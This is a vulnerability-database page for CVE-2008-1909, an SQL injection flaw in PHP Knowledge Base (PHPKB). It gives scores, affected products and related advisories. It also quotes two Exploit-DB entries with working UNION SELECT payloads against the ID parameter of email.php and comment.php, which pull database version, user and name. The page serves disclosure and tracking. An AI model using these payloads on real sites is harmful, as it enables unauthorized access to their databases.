CVE-2008-1909
published 2008-04-22CVE-2008-1909: SQL injection vulnerability in comment.php in PHP Knowledge Base (PHPKB) 1.5 and 2.0 allows remote attackers to execute arbitrary SQL commands via the ID…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.99%
58.1th percentile
SQL injection vulnerability in comment.php in PHP Knowledge Base (PHPKB) 1.5 and 2.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chadha_software_technologies | phpkb_knowledge_base | — | — |
| chadha_software_technologies | phpkb_knowledge_base | — | — |
| knowledgebase-script | phpkb_knowledge_base_software | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wv3m-v2c5-fj5x: Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-5088 [HIGH] CWE-89 GHSA-wv3m-v2c5-fj5x: Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1
Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional allow remote attackers to execute arbitrary SQL commands via the ID parameter to (1) email.php and (2) question.php, a different vector than CVE-2008-1909.
GHSA
GHSA-2p24-r54g-2p7g: SQL injection vulnerability in comment
ghsa_unreviewed·2022-05-01
CVE-2008-1909 [HIGH] CWE-89 GHSA-2p24-r54g-2p7g: SQL injection vulnerability in comment
SQL injection vulnerability in comment.php in PHP Knowledge Base (PHPKB) 1.5 and 2.0 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
No detection rules found.
Exploit-DB
PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections
exploitdb·2010-05-10
CVE-2008-5088 PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections
PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections
---
[+] {In The Name Of Allah The Mercifull}
[+]
[~] Tybe: PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities
[~] Vendor: www.knowledgebase-script.com
[+] Software:PHPKB Knowledge Base Software v2 Multilanguage Support
[-]
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY ---->((4.!.5))
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 04:15 am GMT
[?] Home: © Offensive Security
[?]
[?]
[-]{DEV!L'5 of SYST3M}
# SQL Injection #1 - email.php ID
[*] Err0r C0N50L3:
http://127.0.0.1/email.php?ID={EV!L EXPLO!T}
[*]{EV!L EXPLO!T}
1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*
# SQL Injection #2 - comment.ph
Exploit-DB
PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection
exploitdb·2008-04-11
CVE-2008-1909 PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection
PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection
---
PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability
# Author : parad0x
# Home : www.inso.host.sk
# Script : PHPKB Knowledge Base Software
# Script Homepage : http://www.knowledgebase-script.com
http://[target]/comment.php?ID=[SQL]
Example:
http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*
greetz : VoLqaN
# milw0rm.com [2008-04-11]
http://secunia.com/advisories/29791http://www.securityfocus.com/bid/28739https://exchange.xforce.ibmcloud.com/vulnerabilities/41769https://www.exploit-db.com/exploits/5428http://secunia.com/advisories/29791http://www.securityfocus.com/bid/28739https://exchange.xforce.ibmcloud.com/vulnerabilities/41769https://www.exploit-db.com/exploits/5428
2008-04-22
Published